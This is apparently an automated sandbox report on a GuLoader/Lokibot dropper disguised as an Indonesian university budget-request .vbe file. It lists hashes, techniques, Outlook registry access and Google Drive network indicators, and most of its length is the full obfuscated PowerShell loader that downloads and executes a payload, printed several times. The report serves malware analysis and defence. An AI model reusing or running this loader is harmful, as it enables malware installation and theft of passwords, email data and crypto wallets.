guloader | 7614449f12890951020a0280e1eca1a6719a9fcc2162288bf734ffd6a15686f9

General

Target

PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe
Size

30KB
MD5

48ffdbe11975f3e1508cfc51c099afbc
SHA1

6c827054f0a9bb79595bd7e4dcdda8094474d8c8
SHA256

7614449f12890951020a0280e1eca1a6719a9fcc2162288bf734ffd6a15686f9
SHA512

007a6ac5ffae54e449658de043dfcd2a73788eec63f4952af82e18015d4b823868bfcd132b0306ebb3d31ae4ccd9286bb45dd2c4730002f3f5ce199e30e329ca
SSDEEP

192:3fgZfrE1HfkhjkKcokKa0TH7csFN/kugO48vbcQ0hmFI1NxK+UUftV/m4C4kRM58:38Zo6THFN/x48zP0w+1/84C4mb

Score

10^/10

guloader lokibot collection discovery downloader execution spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow	pid	Process
3	2268	powershell.exe
5	2268	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

wabmig.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
2584	powershell.exe
2268	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
2	drive.google.com
3	drive.google.com
8	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wabmig.exe

pid	Process
2100	wabmig.exe
2100	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewabmig.exe

pid	Process
2584	powershell.exe
2100	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description	pid	Process	procid_target
PID 2584 set thread context of 2100	2584	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execmd.exewabmig.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid	Process
2584	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid	Process
2268	powershell.exe
2584	powershell.exe
2584	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid	Process
2584	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewabmig.exe

description	pid	Process
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2100	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

WScript.exepowershell.execmd.exepowershell.exe

description	pid	Process	procid_target
PID 2344 wrote to memory of 2268	2344	WScript.exe	30
PID 2344 wrote to memory of 2268	2344	WScript.exe	30
PID 2344 wrote to memory of 2268	2344	WScript.exe	30
PID 2268 wrote to memory of 2864	2268	powershell.exe	32
PID 2268 wrote to memory of 2864	2268	powershell.exe	32
PID 2268 wrote to memory of 2864	2268	powershell.exe	32
PID 2268 wrote to memory of 2576	2268	powershell.exe	34
PID 2268 wrote to memory of 2576	2268	powershell.exe	34
PID 2268 wrote to memory of 2576	2268	powershell.exe	34
PID 2576 wrote to memory of 2584	2576	cmd.exe	35
PID 2576 wrote to memory of 2584	2576	cmd.exe	35
PID 2576 wrote to memory of 2584	2576	cmd.exe	35
PID 2576 wrote to memory of 2584	2576	cmd.exe	35
PID 2584 wrote to memory of 2616	2584	powershell.exe	36
PID 2584 wrote to memory of 2616	2584	powershell.exe	36
PID 2584 wrote to memory of 2616	2584	powershell.exe	36
PID 2584 wrote to memory of 2616	2584	powershell.exe	36
PID 2584 wrote to memory of 2100	2584	powershell.exe	37
PID 2584 wrote to memory of 2100	2584	powershell.exe	37
PID 2584 wrote to memory of 2100	2584	powershell.exe	37
PID 2584 wrote to memory of 2100	2584	powershell.exe	37
PID 2584 wrote to memory of 2100	2584	powershell.exe	37
PID 2584 wrote to memory of 2100	2584	powershell.exe	37

outlook_office_path 1 IoCs

Processes:

wabmig.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

Processes:

wabmig.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Rdstjerternes Headgroup Kvistens #>;$Birdmennhalationer='Cryptaesthesia';<#Cretics Monoteisme cupless Ergotaminine Scoldings #>;$Abstrictions=$host.PrivateData;If ($Abstrictions) {$Mundified++;}function Sprattles($Mlkejunge){$Distinct=$Mlkejunge.Length-$Mundified;for( $Birdmen=5;$Birdmen -lt $Distinct;$Birdmen+=6){$Toldforretning+=$Mlkejunge[$Birdmen];}$Toldforretning;}function Genoptagende($Bumlede){ . ($Macrencephalic) ($Bumlede);}$albitical=Sprattles ' .jalMSquawoReflezBarytiUnreelIntral otteaFri r/subse5Funga.spati0Jour. Foran(KoordWTe.esiFormen eofd TruloMariawLuca sKodif MetalNParalTRepeo Dgnla1Antig0 .rus.Loupe0udvik;Micro ParagWJatibi OvernAbsen6parl,4Husnu; Hove BulmexSkole6Gr,nd4Zloty;Featu HemirRitarvFremm:Tukan1Magn 2In ka1So,id.Hj.ed0 scop) be r una uGPycnoeasy ccRegnek SoluoNonze/samme2 Re.o0.rsti1 adom0P.ege0Blodh1Panth0 Squa1 Zoon otorF T.lliPa verLoka.eA tovfUrba oMaskix ritt/ Sty 1 agt2 tryg1Umbra.Afbud0Solit ';$Subdeaconship=Sprattles 'atomsuVrditScos eEK osrrInt n-StereaUncelgSy,chEStorrNBlendt Inde ';$Eichmann=Sprattles 'Faaesh E getSnetyt Julep tilssBes.o:Tappe/Nonpe/EndobdMiaowrFaldkiOver v Org.eDoven.B,gnigSo tmoKraveoHo.rfgBasenlOxycoeBlott. annocOm ryoPar,mmlovfo/Myst.uretrac Ses ?Bullse Bogkxbetrap ,oldo seur EstitTerap=CocredvgteroLeafmwOptagnDel.rlSalico.nderaSparcdForsi&Joha i armodQuene= subp1SvmmeMPolycvUnalid GstgDAnarcI OrgaXRick bPell,cPolytD.vmmefCrossM Greek Bob,CM nisCCervi1StalaJ ,irepThiosXKa,enPPrep.UUltra7ProviWAfbla4T.llizReforWDandrP Diadw S,iny eposLUnder1SchrarOpdalgRedis ';$Legalitetssprgsmaals75=Sprattles 'Gurgl> int, ';$Macrencephalic=Sprattles 'e,fomIP oliE PreeXCivil ';$Endostylic='Etymologizing';$Seminationalisation = Sprattles 'Leonie Rg lc UnimhCo,ntoU inf Forgi%Oversa mblep P,atpSvovld O.biaboffotSkorza mpr% Felt\myeloke,geloFlickmLareemOvertu UptunRusteeB.frepOptogl LnsiaOmsadn kurklAspi gDisconKlumpiLnfornbo,abg kar.e.larmrT,flesDishy.SkotvPnielse Spahr,erso Capos& Roug&Sygel degume sp cc scrah icksoAmoeb Spejlt ,ril ';Genoptagende (Sprattles 'Weakn$ Undeg astblAfs loForudbBl geaLollolCenob:Stag TEncepe D cke GalatTrideoSavnetAfskaaHoos.lSilhu=Scand(Sig nc MiramStirpdBrune Wi el/RudiscSalem Fors$CerebS ektie evrmCo muiIndulnCharaaP eurtU.geni elemoPel dnMervraSjatslDolomiInsufsDepura Dvr tafgrei Aluio UdponAtmos)fluor ');Genoptagende (Sprattles 'Kejse$ ,raggWaftelTek.toNatiobKnageaFluidlBundf: Hyl DDraymiRi.eraStigrmSyrphaAmphonAnalptPredesRekurlMiddoiMa erbOverfe Frabr DyngeOffenn oatsHy op=Admin$ PrehELaegeiSambec Ov,rhZoantm G,vea DagdnInt rn Uvae.Valses UninpTomenlcamasiU,fortProcr( Wolf$LucifL robeFl rigS igraSnigslMonopiBrammtOrcane I crt chemsSlippsAurifpSilksrLimsigDen.astisanm endia OmegaNonpllBru es Nobl7Alleh5Badmi)Fruit ');Genoptagende (Sprattles 'R ens[,nsavN Homee U antEirk,.AquacSVendae igenrdo mfvWhimbiO ernc bitseUnd cPAcacao iddi bedrn E,netTropaMHoundaU wein ClifaWestegRhagie UnderWinne] Synt: illa:InforSGy aseTalepcVr.nguSubporParadiEle,atbureayRaaskPAmorarT nkroUdbrat AnkeoIndstcOverfoEn opl Bort Decor= A er Unbla[Fi miNSpgelefremktSessi.G tesS ,kyee Titoc Sa,luGodtrrMlkeri krdtDelfuyMaalfP trirSl dfoNonamtBirdno RaascborraoVidtllTralvT Undeyfora pAedeaeSu de] A am: Ce t:MusisTLongwlRaastsFerti1Texas2Born ');$Eichmann=$Diamantsliberens[0];$Glossata= (Sprattles ' ,ste$Over GCu arLFumisoHusmoBDyrp aMajusl.oren:O,erkdAlbesEFagliaForsvtOutslH Indeb Taksl GenaoTrikowTendeS Poes=,nparnWindbeUnannwM ter- M sloSneglBRes,oJVirksEBru.eCfloreTForho S aags injeyFo lassto,kTlejlieHolm m nsol.R,nden galleRu det nonu.TsemiWFormae ReoxbTj nsCPr colBungoiTonkpE DyreND lenT');$Glossata+=$Teetotal[1];Genoptagende ($Glossata);Genoptagende (Sprattles 'Regnf$ EuguDHeroieOrthoaDyngvt ivnihBoligbBe orlS nyao Rod,wBehansCigar. IdemHKo poeFunktafilbedReside .ublr O,ersBipro[deduc$CivilSTagenuTrichbHaemaddiaseeHjerna Frogc Whi.oPulc nTaransstrafhM usei Ko gpGrund] Stic=R.tsk$BrokraChec.lsodalb Cor,iBa intBathuiTempecHadefaHjkonl Gerv ');$Treaaring=Sprattles 'Celto$ ncorDWoodweSamieaLat gtForivhConfeb DriflomerroIchthw FlygsKuppe. FormDHavneoSli hw Paran entalUnpunoKlagea AkkodNon iFSmarti AflglEmmy.eSveri(Teori$ UndeEstedmi esamcFlde hHe tumChhatasilben Bea,n ygge,Thems$ vildcMyel.oTristcKreprkbrystt Parea FliniMord lverdikSekunjmas,loF emslBom,neMungrrAntivn GlomeEmasc)Agrim ';$cocktailkjolerne=$Teetotal[0];Genoptagende (Sprattles 'Alter$Orieng FenblLodgeo R.crbE,vinatraguL Musi:AmenafSnedsOdramarSlopeFPerilJ RygsEdupliDKa kue U vi=Skyde(Gran,TPrioreNeuroSDksmaTEnsph-Fo.klPIndenA Stirt Dim h ,esw Tra s$Spildc KiddoFodsvC V ljkTu,tiTTe tpASygepi Usu LRoskikNiendJBord OFreebLC,tateisfahrEjernNPigweEPre,r).esky ');while (!$Forfjede) {Genoptagende (Sprattles 'Volit$Tordiga,fiblSmag,o FoedbCicadaMoi elAltsa:furcafLoc loSammerKlo egHatterAfsmii Reglm ockim,anneeUdhal=Verno$ Taart P ocr BermuVej.eeConut ') ;Genoptagende $Treaaring;Genoptagende (Sprattles 'Adre SEpitytTreh aPro erAalent Sttt- LigeSVareflGeniteSupere TakopPe on f rho4Musti ');Genoptagende (Sprattles 'Moise$Skre g P adl Kerno Rebub GeniaPustelFu.ur:KolpoFguitaoHirserSeijafPubl.jOverbe plo dSnu beBronk=Glott(astomT SpdleMultisHovnetLiths-MccanPSkrivaSamfutSlumah Dris husk$TutticOut.hoNonsucCivilk Arnut Conta T kniFilmalArchik wis j mervoS erllScru ekalcirArsenn UngreDelmo)Rnner ') ;Genoptagende (Sprattles ' Krig$Ubes g,bomalBor.soCarribStonea VirglFalle: Pne,SHelteoAfbagnOasisgSulphfReachuTaalelSn splJenbrymoon = Fora$Prefig AuxilMu tioCaptabSkvataOrganlNavne:AlexiOPatriu FersvPiarreMeasurSa,frtKundeu Phanr,ndoteRaast+Folke+Onych%Uskad$SokolDTerroiGas,eaObl,gm Un iaban,unKontrtStrygs OplalLochyiEcstabMfin.ePersorRetleeProt,nBaneosPh co.wagonc UnstoSkagbuMonotn PeritRouti ') ;$Eichmann=$Diamantsliberens[$Songfully];}$Propagandised=309145;$Heksejagts=29424;Genoptagende (Sprattles 'Ortho$Fratrg ealelVolatoT uxybSprk,a Krool dlan:A genF W eloParaprU deracollonA,tagd statrSmelliObs rnD fibgAccelsAlbats Spi.tAffejn Selvi Specn.ugerg MyrieSpaghrT igonT etaePetti Besky= Pri SvireGSlgtse efitFront-a terCTrochotheron Coact Bittein.icn AllotSl,ds Hand.$ SlavcCessiodock c Lo mkKravet.emapaSulphiTole lFuglekTilv jVi kso andvlRelige inesrColounFlak e Enga ');Genoptagende (Sprattles 'Orexi$Ve dbg Privl ompioLem.ebKli paGero lsnirk: Bu eT B.ggaPebernmilligtalleeDam snDi ectFos,eiGardenBar asFaraotDeltarFladlu R demCsiume rstenIndfrtaftvteh ldut E.stsShowr Dags=Debto Rysl[Slim SHnsejyRigsesSvaletPelareAf.rimUdenl.eft,rC ilskoDoct.nReadivGly.ieStolirProrettil.n]Tor r:Delet:,rotrFMit erBrikeoDamprm urkpB Lunaa UdsksT ynieAroin6Fakul4 WateSUnitat HertrPols.iFulvin,ubing mono(Conur$FryseFLe.tioWaxworBest.a SlevnKrysodGrandrStea iGradensyrengIdiogsSvendsPocostUndernReinfiF.milnGravigUltraeHypodrAntionBrud.e ema) S,rg ');Genoptagende (Sprattles 'F.ugt$Robomgu betlBissaoHjertbSikahaThy.ulLyd.s:MorayK ,ongeAntirdSforzdheaveaNoedvh S,orsHomol Epibi=Bords Vill [z braSUntakyhamstsKorontDe ece Hol mRepos.KoyemTCarmeeU astxAlfaltAntis.StorkEYangtn s recVaporobankhdraaddiCloggnIn.eggStbes] Embr:Udsty:WhiskAFotokS MiscCMenfoIUnsatId spr.FayetGk lone ustt a riSRestatPl murUnsediHimmen almagCafe ( duce$ jiggT Enc aOsteon PolygOysteeTe.tenDuststOverrisaltwnGenops Ca.tt KanfrRbareuDesigmUnc,geInternveikktExam.eing,ntPatrisaande)Sheat ');Genoptagende (Sprattles 'Agpai$AmblygPacedlStoploGangabpakkeaTamtalBakni:DigreWMagnehJakaryGgemaoUnci,=R,stu$ Pe iK TriteMglindSpidsdO.sliaUnv ghEmbolsCompi.orangs vertu UndebErhv sphaent sygerGerbiiDekodn rinsg.onoe(Helio$An,ekPBro krTri socomp pdosimaSkralgec.ocaHypopnAcculdSa.dbi ndefsHjesteOp jedudlbe,forto$CohabH SamaeCompikJournsEmboneAf,etjForfaaF.ancgSprget tulusInves)C.tca ');Genoptagende $Whyo;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kommuneplanlgningers.Per && echo t"
    3⤵
    PID:2864
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Rdstjerternes Headgroup Kvistens #>;$Birdmennhalationer='Cryptaesthesia';<#Cretics Monoteisme cupless Ergotaminine Scoldings #>;$Abstrictions=$host.PrivateData;If ($Abstrictions) {$Mundified++;}function Sprattles($Mlkejunge){$Distinct=$Mlkejunge.Length-$Mundified;for( $Birdmen=5;$Birdmen -lt $Distinct;$Birdmen+=6){$Toldforretning+=$Mlkejunge[$Birdmen];}$Toldforretning;}function Genoptagende($Bumlede){ . ($Macrencephalic) ($Bumlede);}$albitical=Sprattles ' .jalMSquawoReflezBarytiUnreelIntral otteaFri r/subse5Funga.spati0Jour. Foran(KoordWTe.esiFormen eofd TruloMariawLuca sKodif MetalNParalTRepeo Dgnla1Antig0 .rus.Loupe0udvik;Micro ParagWJatibi OvernAbsen6parl,4Husnu; Hove BulmexSkole6Gr,nd4Zloty;Featu HemirRitarvFremm:Tukan1Magn 2In ka1So,id.Hj.ed0 scop) be r una uGPycnoeasy ccRegnek SoluoNonze/samme2 Re.o0.rsti1 adom0P.ege0Blodh1Panth0 Squa1 Zoon otorF T.lliPa verLoka.eA tovfUrba oMaskix ritt/ Sty 1 agt2 tryg1Umbra.Afbud0Solit ';$Subdeaconship=Sprattles 'atomsuVrditScos eEK osrrInt n-StereaUncelgSy,chEStorrNBlendt Inde ';$Eichmann=Sprattles 'Faaesh E getSnetyt Julep tilssBes.o:Tappe/Nonpe/EndobdMiaowrFaldkiOver v Org.eDoven.B,gnigSo tmoKraveoHo.rfgBasenlOxycoeBlott. annocOm ryoPar,mmlovfo/Myst.uretrac Ses ?Bullse Bogkxbetrap ,oldo seur EstitTerap=CocredvgteroLeafmwOptagnDel.rlSalico.nderaSparcdForsi&Joha i armodQuene= subp1SvmmeMPolycvUnalid GstgDAnarcI OrgaXRick bPell,cPolytD.vmmefCrossM Greek Bob,CM nisCCervi1StalaJ ,irepThiosXKa,enPPrep.UUltra7ProviWAfbla4T.llizReforWDandrP Diadw S,iny eposLUnder1SchrarOpdalgRedis ';$Legalitetssprgsmaals75=Sprattles 'Gurgl> int, ';$Macrencephalic=Sprattles 'e,fomIP oliE PreeXCivil ';$Endostylic='Etymologizing';$Seminationalisation = Sprattles 'Leonie Rg lc UnimhCo,ntoU inf Forgi%Oversa mblep P,atpSvovld O.biaboffotSkorza mpr% Felt\myeloke,geloFlickmLareemOvertu UptunRusteeB.frepOptogl LnsiaOmsadn kurklAspi gDisconKlumpiLnfornbo,abg kar.e.larmrT,flesDishy.SkotvPnielse Spahr,erso Capos& Roug&Sygel degume sp cc scrah icksoAmoeb Spejlt ,ril ';Genoptagende (Sprattles 'Weakn$ Undeg astblAfs loForudbBl geaLollolCenob:Stag TEncepe D cke GalatTrideoSavnetAfskaaHoos.lSilhu=Scand(Sig nc MiramStirpdBrune Wi el/RudiscSalem Fors$CerebS ektie evrmCo muiIndulnCharaaP eurtU.geni elemoPel dnMervraSjatslDolomiInsufsDepura Dvr tafgrei Aluio UdponAtmos)fluor ');Genoptagende (Sprattles 'Kejse$ ,raggWaftelTek.toNatiobKnageaFluidlBundf: Hyl DDraymiRi.eraStigrmSyrphaAmphonAnalptPredesRekurlMiddoiMa erbOverfe Frabr DyngeOffenn oatsHy op=Admin$ PrehELaegeiSambec Ov,rhZoantm G,vea DagdnInt rn Uvae.Valses UninpTomenlcamasiU,fortProcr( Wolf$LucifL robeFl rigS igraSnigslMonopiBrammtOrcane I crt chemsSlippsAurifpSilksrLimsigDen.astisanm endia OmegaNonpllBru es Nobl7Alleh5Badmi)Fruit ');Genoptagende (Sprattles 'R ens[,nsavN Homee U antEirk,.AquacSVendae igenrdo mfvWhimbiO ernc bitseUnd cPAcacao iddi bedrn E,netTropaMHoundaU wein ClifaWestegRhagie UnderWinne] Synt: illa:InforSGy aseTalepcVr.nguSubporParadiEle,atbureayRaaskPAmorarT nkroUdbrat AnkeoIndstcOverfoEn opl Bort Decor= A er Unbla[Fi miNSpgelefremktSessi.G tesS ,kyee Titoc Sa,luGodtrrMlkeri krdtDelfuyMaalfP trirSl dfoNonamtBirdno RaascborraoVidtllTralvT Undeyfora pAedeaeSu de] A am: Ce t:MusisTLongwlRaastsFerti1Texas2Born ');$Eichmann=$Diamantsliberens[0];$Glossata= (Sprattles ' ,ste$Over GCu arLFumisoHusmoBDyrp aMajusl.oren:O,erkdAlbesEFagliaForsvtOutslH Indeb Taksl GenaoTrikowTendeS Poes=,nparnWindbeUnannwM ter- M sloSneglBRes,oJVirksEBru.eCfloreTForho S aags injeyFo lassto,kTlejlieHolm m nsol.R,nden galleRu det nonu.TsemiWFormae ReoxbTj nsCPr colBungoiTonkpE DyreND lenT');$Glossata+=$Teetotal[1];Genoptagende ($Glossata);Genoptagende (Sprattles 'Regnf$ EuguDHeroieOrthoaDyngvt ivnihBoligbBe orlS nyao Rod,wBehansCigar. IdemHKo poeFunktafilbedReside .ublr O,ersBipro[deduc$CivilSTagenuTrichbHaemaddiaseeHjerna Frogc Whi.oPulc nTaransstrafhM usei Ko gpGrund] Stic=R.tsk$BrokraChec.lsodalb Cor,iBa intBathuiTempecHadefaHjkonl Gerv ');$Treaaring=Sprattles 'Celto$ ncorDWoodweSamieaLat gtForivhConfeb DriflomerroIchthw FlygsKuppe. FormDHavneoSli hw Paran entalUnpunoKlagea AkkodNon iFSmarti AflglEmmy.eSveri(Teori$ UndeEstedmi esamcFlde hHe tumChhatasilben Bea,n ygge,Thems$ vildcMyel.oTristcKreprkbrystt Parea FliniMord lverdikSekunjmas,loF emslBom,neMungrrAntivn GlomeEmasc)Agrim ';$cocktailkjolerne=$Teetotal[0];Genoptagende (Sprattles 'Alter$Orieng FenblLodgeo R.crbE,vinatraguL Musi:AmenafSnedsOdramarSlopeFPerilJ RygsEdupliDKa kue U vi=Skyde(Gran,TPrioreNeuroSDksmaTEnsph-Fo.klPIndenA Stirt Dim h ,esw Tra s$Spildc KiddoFodsvC V ljkTu,tiTTe tpASygepi Usu LRoskikNiendJBord OFreebLC,tateisfahrEjernNPigweEPre,r).esky ');while (!$Forfjede) {Genoptagende (Sprattles 'Volit$Tordiga,fiblSmag,o FoedbCicadaMoi elAltsa:furcafLoc loSammerKlo egHatterAfsmii Reglm ockim,anneeUdhal=Verno$ Taart P ocr BermuVej.eeConut ') ;Genoptagende $Treaaring;Genoptagende (Sprattles 'Adre SEpitytTreh aPro erAalent Sttt- LigeSVareflGeniteSupere TakopPe on f rho4Musti ');Genoptagende (Sprattles 'Moise$Skre g P adl Kerno Rebub GeniaPustelFu.ur:KolpoFguitaoHirserSeijafPubl.jOverbe plo dSnu beBronk=Glott(astomT SpdleMultisHovnetLiths-MccanPSkrivaSamfutSlumah Dris husk$TutticOut.hoNonsucCivilk Arnut Conta T kniFilmalArchik wis j mervoS erllScru ekalcirArsenn UngreDelmo)Rnner ') ;Genoptagende (Sprattles ' Krig$Ubes g,bomalBor.soCarribStonea VirglFalle: Pne,SHelteoAfbagnOasisgSulphfReachuTaalelSn splJenbrymoon = Fora$Prefig AuxilMu tioCaptabSkvataOrganlNavne:AlexiOPatriu FersvPiarreMeasurSa,frtKundeu Phanr,ndoteRaast+Folke+Onych%Uskad$SokolDTerroiGas,eaObl,gm Un iaban,unKontrtStrygs OplalLochyiEcstabMfin.ePersorRetleeProt,nBaneosPh co.wagonc UnstoSkagbuMonotn PeritRouti ') ;$Eichmann=$Diamantsliberens[$Songfully];}$Propagandised=309145;$Heksejagts=29424;Genoptagende (Sprattles 'Ortho$Fratrg ealelVolatoT uxybSprk,a Krool dlan:A genF W eloParaprU deracollonA,tagd statrSmelliObs rnD fibgAccelsAlbats Spi.tAffejn Selvi Specn.ugerg MyrieSpaghrT igonT etaePetti Besky= Pri SvireGSlgtse efitFront-a terCTrochotheron Coact Bittein.icn AllotSl,ds Hand.$ SlavcCessiodock c Lo mkKravet.emapaSulphiTole lFuglekTilv jVi kso andvlRelige inesrColounFlak e Enga ');Genoptagende (Sprattles 'Orexi$Ve dbg Privl ompioLem.ebKli paGero lsnirk: Bu eT B.ggaPebernmilligtalleeDam snDi ectFos,eiGardenBar asFaraotDeltarFladlu R demCsiume rstenIndfrtaftvteh ldut E.stsShowr Dags=Debto Rysl[Slim SHnsejyRigsesSvaletPelareAf.rimUdenl.eft,rC ilskoDoct.nReadivGly.ieStolirProrettil.n]Tor r:Delet:,rotrFMit erBrikeoDamprm urkpB Lunaa UdsksT ynieAroin6Fakul4 WateSUnitat HertrPols.iFulvin,ubing mono(Conur$FryseFLe.tioWaxworBest.a SlevnKrysodGrandrStea iGradensyrengIdiogsSvendsPocostUndernReinfiF.milnGravigUltraeHypodrAntionBrud.e ema) S,rg ');Genoptagende (Sprattles 'F.ugt$Robomgu betlBissaoHjertbSikahaThy.ulLyd.s:MorayK ,ongeAntirdSforzdheaveaNoedvh S,orsHomol Epibi=Bords Vill [z braSUntakyhamstsKorontDe ece Hol mRepos.KoyemTCarmeeU astxAlfaltAntis.StorkEYangtn s recVaporobankhdraaddiCloggnIn.eggStbes] Embr:Udsty:WhiskAFotokS MiscCMenfoIUnsatId spr.FayetGk lone ustt a riSRestatPl murUnsediHimmen almagCafe ( duce$ jiggT Enc aOsteon PolygOysteeTe.tenDuststOverrisaltwnGenops Ca.tt KanfrRbareuDesigmUnc,geInternveikktExam.eing,ntPatrisaande)Sheat ');Genoptagende (Sprattles 'Agpai$AmblygPacedlStoploGangabpakkeaTamtalBakni:DigreWMagnehJakaryGgemaoUnci,=R,stu$ Pe iK TriteMglindSpidsdO.sliaUnv ghEmbolsCompi.orangs vertu UndebErhv sphaent sygerGerbiiDekodn rinsg.onoe(Helio$An,ekPBro krTri socomp pdosimaSkralgec.ocaHypopnAcculdSa.dbi ndefsHjesteOp jedudlbe,forto$CohabH SamaeCompikJournsEmboneAf,etjForfaaF.ancgSprget tulusInves)C.tca ');Genoptagende $Whyo;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Rdstjerternes Headgroup Kvistens #>;$Birdmennhalationer='Cryptaesthesia';<#Cretics Monoteisme cupless Ergotaminine Scoldings #>;$Abstrictions=$host.PrivateData;If ($Abstrictions) {$Mundified++;}function Sprattles($Mlkejunge){$Distinct=$Mlkejunge.Length-$Mundified;for( $Birdmen=5;$Birdmen -lt $Distinct;$Birdmen+=6){$Toldforretning+=$Mlkejunge[$Birdmen];}$Toldforretning;}function Genoptagende($Bumlede){ . ($Macrencephalic) ($Bumlede);}$albitical=Sprattles ' .jalMSquawoReflezBarytiUnreelIntral otteaFri r/subse5Funga.spati0Jour. Foran(KoordWTe.esiFormen eofd TruloMariawLuca sKodif MetalNParalTRepeo Dgnla1Antig0 .rus.Loupe0udvik;Micro ParagWJatibi OvernAbsen6parl,4Husnu; Hove BulmexSkole6Gr,nd4Zloty;Featu HemirRitarvFremm:Tukan1Magn 2In ka1So,id.Hj.ed0 scop) be r una uGPycnoeasy ccRegnek SoluoNonze/samme2 Re.o0.rsti1 adom0P.ege0Blodh1Panth0 Squa1 Zoon otorF T.lliPa verLoka.eA tovfUrba oMaskix ritt/ Sty 1 agt2 tryg1Umbra.Afbud0Solit ';$Subdeaconship=Sprattles 'atomsuVrditScos eEK osrrInt n-StereaUncelgSy,chEStorrNBlendt Inde ';$Eichmann=Sprattles 'Faaesh E getSnetyt Julep tilssBes.o:Tappe/Nonpe/EndobdMiaowrFaldkiOver v Org.eDoven.B,gnigSo tmoKraveoHo.rfgBasenlOxycoeBlott. annocOm ryoPar,mmlovfo/Myst.uretrac Ses ?Bullse Bogkxbetrap ,oldo seur EstitTerap=CocredvgteroLeafmwOptagnDel.rlSalico.nderaSparcdForsi&Joha i armodQuene= subp1SvmmeMPolycvUnalid GstgDAnarcI OrgaXRick bPell,cPolytD.vmmefCrossM Greek Bob,CM nisCCervi1StalaJ ,irepThiosXKa,enPPrep.UUltra7ProviWAfbla4T.llizReforWDandrP Diadw S,iny eposLUnder1SchrarOpdalgRedis ';$Legalitetssprgsmaals75=Sprattles 'Gurgl> int, ';$Macrencephalic=Sprattles 'e,fomIP oliE PreeXCivil ';$Endostylic='Etymologizing';$Seminationalisation = Sprattles 'Leonie Rg lc UnimhCo,ntoU inf Forgi%Oversa mblep P,atpSvovld O.biaboffotSkorza mpr% Felt\myeloke,geloFlickmLareemOvertu UptunRusteeB.frepOptogl LnsiaOmsadn kurklAspi gDisconKlumpiLnfornbo,abg kar.e.larmrT,flesDishy.SkotvPnielse Spahr,erso Capos& Roug&Sygel degume sp cc scrah icksoAmoeb Spejlt ,ril ';Genoptagende (Sprattles 'Weakn$ Undeg astblAfs loForudbBl geaLollolCenob:Stag TEncepe D cke GalatTrideoSavnetAfskaaHoos.lSilhu=Scand(Sig nc MiramStirpdBrune Wi el/RudiscSalem Fors$CerebS ektie evrmCo muiIndulnCharaaP eurtU.geni elemoPel dnMervraSjatslDolomiInsufsDepura Dvr tafgrei Aluio UdponAtmos)fluor ');Genoptagende (Sprattles 'Kejse$ ,raggWaftelTek.toNatiobKnageaFluidlBundf: Hyl 